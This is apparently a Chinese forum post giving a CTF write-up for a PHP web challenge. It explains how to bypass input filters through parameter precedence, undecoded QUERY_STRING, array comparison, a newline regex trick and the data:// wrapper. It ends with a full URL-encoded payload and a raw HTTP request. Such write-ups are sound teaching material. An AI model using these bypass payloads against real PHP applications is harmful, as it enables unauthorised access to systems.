CTF-11解题思路

Track-子羽   ·   发表于 2021-11-17 11:55:57   ·   CTF&WP专版

源码分析:

  1. foreach ($_REQUEST as $key => $value) {
  2. if(preg_match('/[a-zA-Z]/i', $value)) die('Hello Hack.');
  3. }

利用解析时,按照环境变量,get,post的顺序,用post进行覆盖

  1. if($_SERVER){
  2. if(preg_match('/cyber|flag|ciscn/i', $_SERVER['QUERY_STRING'])) die('Hello Hack..');
  3. }

利用server[query_string]不进行url解码的特性绕过

  1. if(!(substr($_GET['cyber'], 32) === md5($_GET['cyber']))){
  2. die('Hello Hack...');

数组绕过

  1. if(preg_match('/^ciscnsec$/', $_GET['ciscn']) && $_GET['ciscn'] !== 'ciscnsec'){
  2. $getflag = file_get_contents($_GET['flag']);

首先正则没有/d,因此用%0a绕过
然后file部分利用data伪协议控制内容

  1. POST:cyber[]=ciscnsec&flag=data://text/plain,security&ciscn=ciscnsec
  2. (需要进行url编码)

payload:

  1. POST:%63%79%62%65%72[]=%63%69%73%63%6e%73%65%63&%66%6c%61%67=data://text/plain,%73%65%63%75%72%69%74%79&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a
  2. 数据包:
  3. POST /?%63%79%62%65%72[]=%63%69%73%63%6e%73%65%63&%66%6c%61%67=data://text/plain,%73%65%63%75%72%69%74%79&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a HTTP/1.1
  4. Host: 靶场ip
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  7. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  8. Accept-Encoding: gzip, deflate
  9. DNT: 1
  10. X-Forwarded-For: 127.0.0.1
  11. Connection: keep-alive
  12. Upgrade-Insecure-Requests: 1
  13. Content-Type: application/x-www-form-urlencoded
  14. Content-Length: 21
  15. cyber=123&flag=123124&ciscn=111

打赏我,让我更有动力~

0 Reply   |  Until 2021-11-17 | 411 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.